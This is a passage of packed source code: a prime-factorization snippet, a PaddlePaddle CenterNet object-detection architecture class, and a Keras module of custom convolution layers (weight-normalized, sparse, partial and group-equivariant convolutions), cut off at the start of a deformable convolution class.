    per line, smallest first (repeated factors printed once per occurrence).

    Fixes over the previous draft:
    - floor division (``//``) keeps ``n`` an int on Python 3, avoiding float
      output such as ``6857.0`` and precision loss for large inputs;
    - the factors 2 and ``i`` are actually printed, as the comments promised.
    """
    # Print and strip out every factor of two first ...
    while n % 2 == 0:
        print(2)
        n = n // 2
    # ... so n is odd here and a step of 2 (i = i + 2) can be used.
    for i in range(3, int(math.sqrt(n)) + 1, 2):
        # While i divides n, print i and divide n.
        while n % i == 0:
            print(i)
            n = n // i
    # Whatever remains above 2 is itself prime.
    if n > 2:
        print(n)


prime_factor(600851475143)
| 533 | 202 |
# AUTHOR: Zehui Gong
# DATE: 2020/6/16
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import OrderedDict
import copy
from paddle import fluid
from paddle.fluid.param_attr import ParamAttr
from paddle.fluid.initializer import Xavier, Constant
from ppdet.core.workspace import register
import numpy as np
from ppdet.utils.check import check_version
from .cornernet_squeeze import rescale_bboxes
from .input_helper import corner_multiscale_def
from .AdativeFeatureSelection import FeatureFusion, AdaptFeatureFusionV1
__all__ = ['CenterNet']
@register
class CenterNet(object):
    """CenterNet detection architecture: backbone -> optional neck -> fused
    features -> CenterHead (heatmap / width-height / offset regression).

    Args:
        single_scale (bool): a flag that represents whether use single scale
            feature (e.g., level3) or multi-scale feature fusion (fuse
            features across various resolutions) to predict the final
            heatmap and size.
    """
    __category__ = 'architecture'
    __inject__ = ['backbone', 'neck', 'head']
    __shared__ = ['num_classes']

    def __init__(self,
                 backbone,
                 neck=None,
                 head='CenterHead',
                 num_classes=80,
                 single_scale=True,
                 spatial_scales=[0.25]):
        # NOTE(review): mutable default for ``spatial_scales`` is shared across
        # instances — harmless as long as it is never mutated in place.
        check_version('1.8.0')
        super(CenterNet, self).__init__()
        self.backbone = backbone
        self.neck = neck
        self.head = head
        self.num_classes = num_classes
        self.single_scale = single_scale
        self.spatial_scales = spatial_scales

    def extract_feat(self, x):
        """Run backbone (+ neck if any), then fuse the multi-level features."""
        body_feats = self.backbone(x)
        if self.neck is not None:
            # the input and output for bifpn are list or tuple
            if self.neck.__class__.__name__ in ['BiFPN']:
                body_feats = tuple(body_feats.values())
                body_feats = self.neck(body_feats)
                # reverse so ordering matches the non-BiFPN branch below
                body_feats = body_feats[::-1]
            else:
                body_feats, _ = self.neck.get_output(body_feats)
                body_feats = list(body_feats.values())
        else:
            body_feats = list(body_feats.values())
        # feature_fusion = FeatureFusion(self.single_scale, self.spatial_scales)
        feature_fusion = AdaptFeatureFusionV1(spatial_scales=self.spatial_scales,
                                              num_channels=body_feats[0].shape[1])
        body_feats = feature_fusion(body_feats)
        return body_feats

    def build(self, feed_vars, mode='train'):
        """Build the train graph (returns losses) or test graph (returns bboxes)."""
        im = feed_vars['image']
        body_feats = self.extract_feat(im)
        if mode == 'train':
            target_vars = ['heatmaps', 'reg_mask', 'ind', 'wh', 'regrs']  # heat_weight
            target = {key: feed_vars[key] for key in target_vars}
            self.head.get_output(body_feats)
            loss = self.head.get_loss(target)
            return loss
        elif mode == 'test':
            ratios = feed_vars['ratios']
            borders = feed_vars['borders']
            # predictions come from the last fused feature map
            bboxes, scores, clses = self.head.get_prediction(body_feats[-1])
            # map boxes from network input space back to the original image
            bboxes = rescale_bboxes(bboxes, ratios, borders)
            detections = fluid.layers.concat([clses, scores, bboxes], axis=2)
            detections = detections[0]
            return {'bbox': detections}

    def build_multi_scale(self, feed_vars):
        """Build one test graph per test scale (optionally with flipped input)."""
        results = {}
        for i, scale in enumerate(self.test_scales):
            im_name = 'image_scale_{}'.format(scale)
            ratio_name = 'ratios_' + im_name
            border_name = 'borders_' + im_name
            # sizes_name = 'sizes_' + im_name
            img = feed_vars[im_name]
            ratios = feed_vars[ratio_name]
            borders = feed_vars[border_name]
            # sizes = feed_vars[sizes_name]
            if self.use_flip:
                # batch the flipped image together with the original
                im_name_flip = 'image_flip_scale_{}'.format(scale)
                im_flip = feed_vars[im_name_flip]
                img = fluid.layers.concat([img, im_flip], axis=0)
            body_feats = self.extract_feat(img)
            bboxes, scores, clses = self.head.get_prediction(
                body_feats[-1], use_flip=self.use_flip)
            bboxes = rescale_bboxes(bboxes, ratios, borders)
            # undo the test-time resize for this scale
            bboxes = bboxes / scale
            detection = fluid.layers.concat([clses, scores, bboxes], axis=2)
            det_name = 'bbox_scale_{}'.format(scale)
            results[det_name] = detection[0]
        return results

    def _input_check(self, require_fields, feed_vars):
        """Assert that every required field is present in ``feed_vars``."""
        for var in require_fields:
            assert var in feed_vars, \
                "{} has no {} field".format(feed_vars, var)

    def _inputs_def(self, image_shape, output_size, max_tag_len):
        """Declare shape/dtype/lod for every possible input. output_size: (w, h)"""
        im_shape = [None] + image_shape
        C = self.num_classes
        # yapf: disable
        inputs_def = {
            'image': {'shape': im_shape, 'dtype': 'float32', 'lod_level': 0},
            'im_id': {'shape': [None, 1], 'dtype': 'int64', 'lod_level': 0},
            'gt_bbox': {'shape': [None, 4], 'dtype': 'float32', 'lod_level': 1},
            'gt_class': {'shape': [None, 1], 'dtype': 'int32', 'lod_level': 1},
            'ratios': {'shape': [None, 2], 'dtype': 'float32', 'lod_level': 0},
            'borders': {'shape': [None, 4], 'dtype': 'float32', 'lod_level': 0},
            'sizes': {'shape': [None, 2], 'dtype': 'float32', 'lod_level': 0},
            'heatmaps': {'shape': [None, C, output_size[1], output_size[0]], 'dtype': 'float32', 'lod_level': 0},
            'regrs': {'shape': [None, max_tag_len, 2], 'dtype': 'float32', 'lod_level': 0},
            'reg_mask': {'shape': [None, max_tag_len], 'dtype': 'float32', 'lod_level': 0},
            'ind': {'shape': [None, max_tag_len], 'dtype': 'int64', 'lod_level': 0},
            'wh': {'shape': [None, max_tag_len, 2], 'dtype': 'float32', 'lod_level': 0},
            'tlbr': {'shape': [None, 2, output_size[1], output_size[0]], 'dtype': 'float32', 'lod_level': 0},
            'tlbr_mask': {'shape': [None, 1, output_size[1], output_size[0]], 'dtype': 'float32', 'lod_level': 0},
            'heat_weight': {'shape': [None, C, output_size[1], output_size[0]], 'dtype': 'float32', 'lod_level': 0},
            'is_difficult': {'shape': [None, 1], 'dtype': 'int32', 'lod_level': 0},
        }
        # yapf: enable
        return inputs_def

    def build_inputs(
            self,
            image_shape=[3, None, None],
            # NOTE(review): default requests 'gt_box' but _inputs_def declares
            # 'gt_bbox' — a KeyError if this default were used as-is; confirm
            # callers always pass explicit fields.
            fields=[
                'image', 'im_id', 'gt_box', 'gt_class', 'heatmaps',
                'regrs', 'reg_mask', 'ind', 'wh',
            ],  # for train
            multi_scale=False,
            test_scales=[1.0],
            use_flip=None,
            output_size=[128, 128],
            max_tag_len=128,
            use_dataloader=True,
            iterable=False):
        """Create the feed variables (and optional DataLoader) for the graph."""
        inputs_def = self._inputs_def(image_shape, output_size, max_tag_len)
        fields = copy.deepcopy(fields)
        if multi_scale:
            # add per-scale image/ratio/border inputs for multi-scale testing
            ms_def, ms_fields = corner_multiscale_def(image_shape, test_scales, use_flip)
            inputs_def.update(ms_def)
            fields += ms_fields
            self.use_flip = use_flip
            self.test_scales = test_scales
        feed_vars = OrderedDict([(key, fluid.data(
            name=key,
            shape=inputs_def[key]['shape'],
            dtype=inputs_def[key]['dtype'],
            lod_level=inputs_def[key]['lod_level'])) for key in fields])
        loader = fluid.io.DataLoader.from_generator(
            feed_list=list(feed_vars.values()),
            capacity=64,
            use_double_buffer=True,
            iterable=iterable) if use_dataloader else None
        return feed_vars, loader

    def train(self, feed_vars):
        """Build and return the training losses."""
        return self.build(feed_vars, mode='train')

    def eval(self, feed_vars, multi_scale=None):
        """Build the evaluation graph; multi-scale when requested."""
        if multi_scale:
            return self.build_multi_scale(feed_vars)
        return self.build(feed_vars, mode='test')

    def test(self, feed_vars):
        """Build and return the inference graph outputs."""
        return self.build(feed_vars, mode='test')
| 8,038 | 2,659 |
import numpy as np
import tensorflow as tf
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.layers import Layer, Lambda
from tensorflow.python.keras.layers import InputSpec
from tensorflow.python.ops import nn_ops
from tensorflow.python.keras import initializers, regularizers, constraints, activations
from tensorflow.python.keras.utils import conv_utils
def gaussian_init(shape, dtype=None, partition_info=None):
    """Truncated-normal-style initializer: standard normal samples clipped to [-3, 3]."""
    samples = np.clip(np.random.randn(*shape), -3, +3)
    return K.constant(samples, dtype=dtype)
def conv_init_linear(shape, dtype=None, partition_info=None):
    """Initializer for linear conv layers: clipped normal scaled by 1/sqrt(fan_in).

    fan_in is the product of the first three kernel dimensions
    (kernel_h * kernel_w * in_channels).
    """
    samples = np.clip(np.random.randn(*shape), -3, +3)
    fan_in = np.prod(shape[:3])
    samples = samples / (fan_in ** 0.5)
    return K.constant(samples, dtype=dtype)
def conv_init_relu(shape, dtype=None, partition_info=None):
    """He-style initializer for ReLU conv layers: clipped normal scaled by
    sqrt(2)/sqrt(fan_in), with fan_in = kernel_h * kernel_w * in_channels."""
    samples = np.clip(np.random.randn(*shape), -3, +3)
    fan_in = np.prod(shape[:3])
    samples = samples / (fan_in ** 0.5) * 2 ** 0.5
    return K.constant(samples, dtype=dtype)
def conv_init_relu2(shape, dtype=None, partition_info=None):
    """Variant of conv_init_relu with a doubled gain: scale 2/sqrt(fan_in)."""
    samples = np.clip(np.random.randn(*shape), -3, +3)
    fan_in = np.prod(shape[:3])
    samples = samples / (fan_in ** 0.5) * 2
    return K.constant(samples, dtype=dtype)
def depthwiseconv_init_linear(shape, dtype=None, partition_info=None):
    """Initializer for linear depthwise convolutions: clipped normal scaled by
    1/sqrt(fan_in), where fan_in covers only the two spatial kernel dims."""
    samples = np.clip(np.random.randn(*shape), -3, +3)
    fan_in = np.prod(shape[:2])
    samples = samples / (fan_in ** 0.5)
    return K.constant(samples, dtype=dtype)
def depthwiseconv_init_relu(shape, dtype=None, partition_info=None):
    """He-style initializer for ReLU depthwise convolutions: clipped normal
    scaled by sqrt(2)/sqrt(fan_in), fan_in = kernel_h * kernel_w."""
    samples = np.clip(np.random.randn(*shape), -3, +3)
    fan_in = np.prod(shape[:2])
    samples = samples / (fan_in ** 0.5) * 2 ** 0.5
    return K.constant(samples, dtype=dtype)
class Conv2DBaseLayer(Layer):
    """Basic Conv2D class from which other layers inherit.

    Normalizes and stores the common convolution hyper-parameters (kernel
    size, strides, padding, dilation, activation, bias flag and the
    initializer/regularizer/constraint bundles); subclasses create the
    actual weights in their own ``build``.
    """

    def __init__(self,
                 kernel_size,
                 strides=(1, 1),
                 padding='valid',
                 #data_format=None,
                 dilation_rate=(1, 1),
                 activation=None,
                 use_bias=False,
                 kernel_initializer='glorot_uniform',
                 kernel_regularizer=None,
                 kernel_constraint=None,
                 bias_initializer='zeros',
                 bias_regularizer=None,
                 bias_constraint=None,
                 activity_regularizer=None,
                 **kwargs):
        super(Conv2DBaseLayer, self).__init__(
            activity_regularizer=regularizers.get(activity_regularizer), **kwargs)
        # Only 2D convolutions are supported; rank is fixed accordingly.
        self.rank = rank = 2
        # conv_utils.normalize_* accept ints or tuples and always yield tuples.
        self.kernel_size = conv_utils.normalize_tuple(kernel_size, rank, 'kernel_size')
        self.strides = conv_utils.normalize_tuple(strides, rank, 'strides')
        self.padding = conv_utils.normalize_padding(padding)
        self.dilation_rate = conv_utils.normalize_tuple(dilation_rate, rank, 'dilation_rate')
        # get() resolves string identifiers / callables to concrete objects.
        self.activation = activations.get(activation)
        self.use_bias = use_bias
        self.kernel_initializer = initializers.get(kernel_initializer)
        self.kernel_regularizer = regularizers.get(kernel_regularizer)
        self.kernel_constraint = constraints.get(kernel_constraint)
        self.bias_initializer = initializers.get(bias_initializer)
        self.bias_regularizer = regularizers.get(bias_regularizer)
        self.bias_constraint = constraints.get(bias_constraint)

    def get_config(self):
        """Return the serializable layer config (inverse of ``__init__``)."""
        config = super(Conv2DBaseLayer, self).get_config()
        config.update({
            'kernel_size': self.kernel_size,
            'strides': self.strides,
            'padding': self.padding,
            'dilation_rate': self.dilation_rate,
            'activation': activations.serialize(self.activation),
            'use_bias': self.use_bias,
            'kernel_initializer': initializers.serialize(self.kernel_initializer),
            'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
            'kernel_constraint': constraints.serialize(self.kernel_constraint),
            'bias_initializer': initializers.serialize(self.bias_initializer),
            'bias_regularizer': regularizers.serialize(self.bias_regularizer),
            'bias_constraint': constraints.serialize(self.bias_constraint),
            'activity_regularizer': regularizers.serialize(self.activity_regularizer),
        })
        return config
class Conv2D(Conv2DBaseLayer):
    """Conv2D Layer with Weight Normalization.

    # Arguments
        They are the same as for the normal Conv2D layer.
        weightnorm: Boolean flag, whether Weight Normalization is used or not.
    # References
        [Weight Normalization: A Simple Reparameterization to Accelerate Training of Deep Neural Networks](http://arxiv.org/abs/1602.07868)
    """

    def __init__(self, filters, kernel_size, weightnorm=False, eps=1e-6, **kwargs):
        super(Conv2D, self).__init__(kernel_size, **kwargs)
        self.filters = filters
        self.weightnorm = weightnorm
        # eps keeps the weight-norm denominator away from zero.
        self.eps = eps

    def build(self, input_shape):
        """Create kernel, optional weight-norm gain and optional bias."""
        # A list input means (features, ...); the kernel is shaped from the features.
        if type(input_shape) is list:
            feature_shape = input_shape[0]
        else:
            feature_shape = input_shape
        self.kernel_shape = (*self.kernel_size, feature_shape[-1], self.filters)
        self.kernel = self.add_weight(name='kernel',
                                      shape=self.kernel_shape,
                                      initializer=self.kernel_initializer,
                                      regularizer=self.kernel_regularizer,
                                      constraint=self.kernel_constraint,
                                      trainable=True,
                                      dtype=self.dtype)
        if self.weightnorm:
            # per-filter gain g in w = g * v / ||v||
            self.wn_g = self.add_weight(name='wn_g',
                                        shape=(self.filters,),
                                        initializer=initializers.Ones(),
                                        trainable=True,
                                        dtype=self.dtype)
        if self.use_bias:
            self.bias = self.add_weight(name='bias',
                                        shape=(self.filters,),
                                        initializer=self.bias_initializer,
                                        regularizer=self.bias_regularizer,
                                        constraint=self.bias_constraint,
                                        trainable=True,
                                        dtype=self.dtype)
        else:
            self.bias = None
        super(Conv2D, self).build(input_shape)

    def call(self, inputs, **kwargs):
        """Apply (optionally weight-normalized) convolution, bias and activation."""
        if type(inputs) is list:
            features = inputs[0]
        else:
            features = inputs
        if self.weightnorm:
            # normalize the kernel over (h, w, in) per output filter, then rescale by g
            norm = tf.sqrt(tf.reduce_sum(tf.square(self.kernel), (0,1,2)) + self.eps)
            kernel = self.kernel / norm * self.wn_g
        else:
            kernel = self.kernel
        features = K.conv2d(features, kernel,
                            strides=self.strides,
                            padding=self.padding,
                            dilation_rate=self.dilation_rate)
        if self.use_bias:
            features = tf.add(features, self.bias)
        if self.activation is not None:
            features = self.activation(features)
        return features

    def get_config(self):
        """Extend the base config with this layer's extra arguments."""
        config = super(Conv2D, self).get_config()
        config.update({
            'filters': self.filters,
            'weightnorm': self.weightnorm,
            'eps': self.eps,
        })
        return config
class SparseConv2D(Conv2DBaseLayer):
    """2D Sparse Convolution layer for sparse input data.

    # Arguments
        They are the same as for the normal Conv2D layer.
        binary: Boolean flag, whether the sparsity is propagated as binary
            mask or as float values.
    # Input shape
        features: 4D tensor with shape (batch_size, rows, cols, channels)
        mask: 4D tensor with shape (batch_size, rows, cols, 1)
            If no mask is provided, all input pixels with features unequal
            to zero are considered as valid.
    # Example
        x, m = SparseConv2D(32, 3, padding='same')(x)
        x = Activation('relu')(x)
        x, m = SparseConv2D(32, 3, padding='same')([x,m])
        x = Activation('relu')(x)
    # Notes
        Sparse Convolution propagates the sparsity of the input data
        through the network using a 2D mask.
    # References
        [Sparsity Invariant CNNs](https://arxiv.org/abs/1708.06500)
    """

    def __init__(self, filters, kernel_size,
                 kernel_initializer=conv_init_relu,
                 binary=True,
                 **kwargs):
        super(SparseConv2D, self).__init__(kernel_size, kernel_initializer=kernel_initializer, **kwargs)
        self.filters = filters
        self.binary = binary

    def build(self, input_shape):
        """Create the feature kernel plus a constant all-ones mask kernel."""
        if type(input_shape) is list:
            feature_shape = input_shape[0]
        else:
            feature_shape = input_shape
        self.kernel_shape = (*self.kernel_size, feature_shape[-1], self.filters)
        self.kernel = self.add_weight(name='kernel',
                                      shape=self.kernel_shape,
                                      initializer=self.kernel_initializer,
                                      regularizer=self.kernel_regularizer,
                                      constraint=self.kernel_constraint,
                                      trainable=True,
                                      dtype=self.dtype)
        # Non-trainable all-ones kernel: convolving the mask with it counts
        # the valid input positions under each window.
        self.mask_kernel_shape = (*self.kernel_size, 1, 1)
        self.mask_kernel = tf.ones(self.mask_kernel_shape)
        self.mask_fan_in = tf.reduce_prod(self.mask_kernel_shape[:3])
        if self.use_bias:
            self.bias = self.add_weight(name='bias',
                                        shape=(self.filters,),
                                        initializer=self.bias_initializer,
                                        regularizer=self.bias_regularizer,
                                        constraint=self.bias_constraint,
                                        trainable=True,
                                        dtype=self.dtype)
        else:
            self.bias = None
        super(SparseConv2D, self).build(input_shape)

    def call(self, inputs, **kwargs):
        """Convolve masked features and renormalize by the number of valid inputs."""
        if type(inputs) is list:
            features = inputs[0]
            mask = inputs[1]
        else:
            # if no mask is provided, get it from the features
            features = inputs
            mask = tf.where(tf.equal(tf.reduce_sum(features, axis=-1, keepdims=True), 0), 0.0, 1.0)
        # zero out invalid positions before convolving
        features = tf.multiply(features, mask)
        features = nn_ops.convolution(features, self.kernel, self.padding.upper(), self.strides, self.dilation_rate)
        # norm = number of valid input positions contributing to each output
        norm = nn_ops.convolution(mask, self.mask_kernel, self.padding.upper(), self.strides, self.dilation_rate)
        mask_fan_in = tf.cast(self.mask_fan_in, 'float32')
        if self.binary:
            mask = tf.where(tf.greater(norm,0), 1.0, 0.0)
        else:
            mask = norm / mask_fan_in
        #ratio = tf.where(tf.equal(norm,0), 0.0, 1/norm) # Note: The authors use this in the paper, but it would require special initialization...
        ratio = tf.where(tf.equal(norm,0), 0.0, mask_fan_in/norm)
        features = tf.multiply(features, ratio)
        if self.use_bias:
            features = tf.add(features, self.bias)
        if self.activation is not None:
            features = self.activation(features)
        return [features, mask]

    def compute_output_shape(self, input_shape):
        """Return [feature_shape, mask_shape]; the mask keeps a single channel."""
        if type(input_shape) is list:
            feature_shape = input_shape[0]
        else:
            feature_shape = input_shape
        space = feature_shape[1:-1]
        new_space = []
        for i in range(len(space)):
            new_dim = conv_utils.conv_output_length(
                space[i],
                self.kernel_size[i],
                padding=self.padding,
                stride=self.strides[i],
                dilation=self.dilation_rate[i])
            new_space.append(new_dim)
        feature_shape = [feature_shape[0], *new_space, self.filters]
        mask_shape = [*feature_shape[:-1], 1]
        return [feature_shape, mask_shape]

    def get_config(self):
        """Extend the base config with this layer's extra arguments."""
        config = super(SparseConv2D, self).get_config()
        config.update({
            'filters': self.filters,
            'binary': self.binary,
        })
        return config
class PartialConv2D(Conv2DBaseLayer):
    """2D Partial Convolution layer for sparse input data.

    # Arguments
        They are the same as for the normal Conv2D layer.
        binary: Boolean flag, whether the sparsity is propagated as binary
            mask or as float values.
    # Input shape
        features: 4D tensor with shape (batch_size, rows, cols, channels)
        mask: 4D tensor with shape (batch_size, rows, cols, channels)
            If the shape is (batch_size, rows, cols, 1), the mask is repeated
            for each channel. If no mask is provided, all input elements
            unequal to zero are considered as valid.
    # Example
        x, m = PartialConv2D(32, 3, padding='same')(x)
        x = Activation('relu')(x)
        x, m = PartialConv2D(32, 3, padding='same')([x,m])
        x = Activation('relu')(x)
    # Notes
        In contrast to Sparse Convolution, Partial Convolution propagates
        the sparsity for each channel separately. This makes it possible
        to concatenate the features and the masks from different branches
        in architecture.
    # References
        [Image Inpainting for Irregular Holes Using Partial Convolutions](https://arxiv.org/abs/1804.07723)
        [Sparsity Invariant CNNs](https://arxiv.org/abs/1708.06500)
    """

    def __init__(self, filters, kernel_size,
                 kernel_initializer=conv_init_relu,
                 binary=True,
                 weightnorm=False,
                 eps=1e-6,
                 **kwargs):
        super(PartialConv2D, self).__init__(kernel_size, kernel_initializer=kernel_initializer, **kwargs)
        self.filters = filters
        self.binary = binary
        self.weightnorm = weightnorm
        # eps keeps the weight-norm denominator away from zero.
        self.eps = eps

    def build(self, input_shape):
        """Create kernel, full-channel mask kernel, optional gain and bias."""
        if type(input_shape) is list:
            feature_shape = input_shape[0]
            mask_shape = input_shape[1]
            self.mask_shape = mask_shape
        else:
            feature_shape = input_shape
            self.mask_shape = feature_shape
        self.kernel_shape = (*self.kernel_size, feature_shape[-1], self.filters)
        self.kernel = self.add_weight(name='kernel',
                                      shape=self.kernel_shape,
                                      initializer=self.kernel_initializer,
                                      regularizer=self.kernel_regularizer,
                                      constraint=self.kernel_constraint,
                                      trainable=True,
                                      dtype=self.dtype)
        # Unlike SparseConv2D, the mask kernel spans all input channels so the
        # valid-input count is tracked per output channel.
        self.mask_kernel_shape = (*self.kernel_size, feature_shape[-1], self.filters)
        self.mask_kernel = tf.ones(self.mask_kernel_shape)
        self.mask_fan_in = tf.reduce_prod(self.mask_kernel_shape[:3])
        if self.weightnorm:
            # per-filter gain g in w = g * v / ||v||
            self.wn_g = self.add_weight(name='wn_g',
                                        shape=(self.filters,),
                                        initializer=initializers.Ones(),
                                        trainable=True,
                                        dtype=self.dtype)
        if self.use_bias:
            self.bias = self.add_weight(name='bias',
                                        shape=(self.filters,),
                                        initializer=self.bias_initializer,
                                        regularizer=self.bias_regularizer,
                                        constraint=self.bias_constraint,
                                        trainable=True,
                                        dtype=self.dtype)
        else:
            self.bias = None
        super(PartialConv2D, self).build(input_shape)

    def call(self, inputs, **kwargs):
        """Convolve masked features and renormalize by the valid-input count."""
        if type(inputs) is list:
            features = inputs[0]
            mask = inputs[1]
            # if mask has only one channel, repeat
            if self.mask_shape[-1] == 1:
                mask = tf.repeat(mask, tf.shape(features)[-1], axis=-1)
        else:
            # if no mask is provided, get it from the features
            features = inputs
            mask = tf.where(tf.equal(features, 0), 0.0, 1.0)
        if self.weightnorm:
            # normalize the kernel over (h, w, in) per output filter, then rescale by g
            norm = tf.sqrt(tf.reduce_sum(tf.square(self.kernel), (0,1,2)) + self.eps)
            kernel = self.kernel / norm * self.wn_g
        else:
            kernel = self.kernel
        mask_kernel = self.mask_kernel
        # zero out invalid positions before convolving
        features = tf.multiply(features, mask)
        features = nn_ops.convolution(features, kernel, self.padding.upper(), self.strides, self.dilation_rate)
        # norm = number of valid input elements contributing to each output
        norm = nn_ops.convolution(mask, mask_kernel, self.padding.upper(), self.strides, self.dilation_rate)
        mask_fan_in = tf.cast(self.mask_fan_in, 'float32')
        if self.binary:
            mask = tf.where(tf.greater(norm,0), 1.0, 0.0)
        else:
            mask = norm / mask_fan_in
        ratio = tf.where(tf.equal(norm,0), 0.0, mask_fan_in/norm)
        features = tf.multiply(features, ratio)
        if self.use_bias:
            features = tf.add(features, self.bias)
        if self.activation is not None:
            features = self.activation(features)
        return [features, mask]

    def compute_output_shape(self, input_shape):
        """Return [feature_shape, mask_shape]; here the mask has `filters` channels."""
        if type(input_shape) is list:
            feature_shape = input_shape[0]
        else:
            feature_shape = input_shape
        space = feature_shape[1:-1]
        new_space = []
        for i in range(len(space)):
            new_dim = conv_utils.conv_output_length(
                space[i],
                self.kernel_size[i],
                padding=self.padding,
                stride=self.strides[i],
                dilation=self.dilation_rate[i])
            new_space.append(new_dim)
        feature_shape = [feature_shape[0], *new_space, self.filters]
        mask_shape = [feature_shape[0], *new_space, self.filters]
        return [feature_shape, mask_shape]

    def get_config(self):
        """Extend the base config with this layer's extra arguments."""
        config = super(PartialConv2D, self).get_config()
        config.update({
            'filters': self.filters,
            'binary': self.binary,
            'weightnorm': self.weightnorm,
            'eps': self.eps,
        })
        return config
class GroupConv2D(Conv2DBaseLayer):
    """2D Group Convolution layer that shares weights over symmetries.

    Group Convolution provides discrete rotation equivariance. It reduces the number
    of parameters and typically lead to better results.
    The following two finite groups are supported:
        Cyclic Group C4 (p4, 4 rotational symmetries)
        Dihedral Group D4 (p4m, 4 rotational and 4 reflection symmetries)
    # Arguments
        They are the same as for the normal Conv2D layer.
        filters: int, The effective number of filters is this value multiplied by the
            number of transformations in the group (4 for C4 and 8 for D4)
        kernel_size: int, Only odd values are supported
        group: 'C4' or 'D4', Stay with one group when stacking layers
    # Input shape
        featurs: 4D tensor with shape (batch_size, rows, cols, in_channels)
            or 5D tensor with shape (batch_size, rows, cols, num_transformations, in_channels)
    # Output shape
        featurs: 5D tensor with shape (batch_size, rows, cols, num_transformations, out_channels)
    # Notes
        - BatchNormalization works as expected and shares the statistict over symmetries.
        - Spatial Pooling can be done via AvgPool3D.
        - Pooling along the group dimension can be done via MaxPool3D.
        - Concatenation along the group dimension can be done via Reshape.
        - To get a model with the inference time of a normal CNN, you can load the
          expanded kernel into a normal Conv2D layer. The kernel expansion is
          done in the 'call' method and the expanded kernel is stored in the
          'transformed_kernel' attribute.
    # Example
        x = Input((16,16,3))
        x = GroupConv2D(12, 3, group='D4', padding='same', activation='relu')(x)
        x = BatchNormalization()(x)
        x = GroupConv2D(12, 3, group='D4', padding='same', activation='relu')(x)
        x = AvgPool3D(pool_size=(2,2,1), strides=(2,2,1), padding='same')(x)
        x = GroupConv2D(12, 3, group='D4', padding='same', activation='relu')(x)
        x = MaxPool3D(pool_size=(1,1,x.shape[-2]))(x)
        s = x.shape
        x = Reshape((s[1],s[2],s[3]*s[4]))(x)
    # References
        [Group Equivariant Convolutional Networks](https://arxiv.org/abs/1602.07576)
        [Rotation Equivariant CNNs for Digital Pathology](https://arxiv.org/abs/1806.03962)
        https://github.com/tscohen/GrouPy
        https://github.com/basveeling/keras-gcnn
    """

    def __init__(self, filters, kernel_size, group='D4', **kwargs):
        super(GroupConv2D, self).__init__(kernel_size, **kwargs)
        # The kernel-index transforms below (rot90/flip) require a square, odd kernel.
        if not self.kernel_size[0] == self.kernel_size[1]:
            raise ValueError('Requires square kernel')
        if self.kernel_size[0] % 2 != 1:
            raise ValueError('Requires odd kernel size')
        group = group.upper()
        if group == 'C4':
            self.num_transformations = 4
        elif group == 'D4':
            self.num_transformations = 8
        else:
            raise ValueError('Unknown group')
        self.filters = filters
        self.group = group
        # 4D input = first (lifting) layer; 5D input = already group-structured.
        self.input_spec = InputSpec(min_ndim=4, max_ndim=5)

    def compute_output_shape(self, input_shape):
        """Spatial dims follow normal conv arithmetic; a group axis is appended."""
        space = input_shape[1:3]
        new_space = []
        for i in range(len(space)):
            new_dim = conv_utils.conv_output_length(
                space[i],
                self.kernel_size[i],
                padding=self.padding,
                stride=self.strides[i],
                dilation=self.dilation_rate[i])
            new_space.append(new_dim)
        return (input_shape[0], *new_space, self.num_transformations, self.filters)

    def build(self, input_shape):
        """Create the base (untransformed) kernel and optional bias."""
        if len(input_shape) == 4:
            # lifting layer: plain image input, one input transformation
            self.first = True
            num_in_channels = input_shape[-1]
        else:
            # group layer: fold the (transformations, channels) axes together
            self.first = False
            num_in_channels = input_shape[-2] * input_shape[-1]
        self.kernel = self.add_weight(name='kernel',
                                      shape=(*self.kernel_size, num_in_channels, self.filters),
                                      initializer=self.kernel_initializer,
                                      regularizer=self.kernel_regularizer,
                                      constraint=self.kernel_constraint,
                                      trainable=True,
                                      dtype=self.dtype)
        if self.use_bias:
            self.bias = self.add_weight(name='bias',
                                        shape=(self.filters,),
                                        initializer=self.bias_initializer,
                                        regularizer=self.bias_regularizer,
                                        constraint=self.bias_constraint,
                                        trainable=True,
                                        dtype=self.dtype)
        else:
            self.bias = None
        self.built = True

    def call(self, features):
        """Expand the base kernel over the group, then run one plain conv2d."""
        ni = features.shape[-1]
        no = self.filters
        if self.group == 'C4':
            nt = 4
        elif self.group == 'D4':
            nt = 8
        # nti: input transformations (1 for the lifting layer), nto: output ones.
        nti = 1 if self.first else nt
        nto = nt
        k = self.kernel_size[0]
        # Index cube over (transformation, row, col); rotations/flips of it give
        # the gather indices that realize each group element on the kernel.
        # NOTE(review): the comprehension variable ``k`` shadows the kernel size
        # ``k`` above but is confined to the comprehension scope.
        t = np.reshape(np.arange(nti*k*k), (nti,k,k))
        trafos = [np.rot90(t,k,axes=(1, 2)) for k in range(4)]
        if nt == 8:
            trafos = trafos + [np.flip(t,1) for t in trafos]
        self.trafos = trafos = np.array(trafos)
        # index magic happens here
        if nti == 1:
            indices = trafos
        elif nti == 4:
            indices = [[trafos[l, (m-l)%4 ,:,:] for m in range(4)] for l in range(4)]
        elif nti == 8:
            indices = [[trafos[l, (m-l)%4 if ((m < 4) == (l < 4)) else (m+l)%4+4 ,:,:] for m in range(8)] for l in range(8)]
        self.indices = indices = np.reshape(indices, (nto,nti,k,k))
        # transform the kernel
        kernel = self.kernel
        kernel = tf.reshape(kernel, (nti*k*k, ni, no))
        kernel = tf.gather(kernel, indices, axis=0)
        kernel = tf.reshape(kernel, (nto, nti, k,k, ni, no))
        kernel = tf.transpose(kernel, (2,3,1,4,0,5))
        kernel = tf.reshape(kernel, (k,k, nti*ni, nto*no))
        # kept so the expanded kernel can be loaded into a plain Conv2D later
        self.transformed_kernel = kernel
        if self.first:
            x = features
        else:
            # flatten the (transformations, channels) axes for the 2D conv
            s = features.shape
            x = tf.reshape(features, (-1,s[1],s[2],s[3]*s[4]))
        x = K.conv2d(x, kernel, strides=self.strides, padding=self.padding, dilation_rate=self.dilation_rate)
        # restore the explicit group axis on the output
        s = x.shape
        x = tf.reshape(x, (-1,s[1],s[2],nto,no))
        features = x
        if self.use_bias:
            features = tf.add(features, self.bias)
        if self.activation is not None:
            features = self.activation(features)
        return features

    def get_config(self):
        """Extend the base config with this layer's extra arguments."""
        config = super(GroupConv2D, self).get_config()
        config.update({
            'filters': self.filters,
            'group': self.group,
        })
        return config
class DeformableConv2D(Conv2DBaseLayer):
"""2D Deformable Convolution layer that learns the spatial offsets where
the input elements of the convolution are sampled.
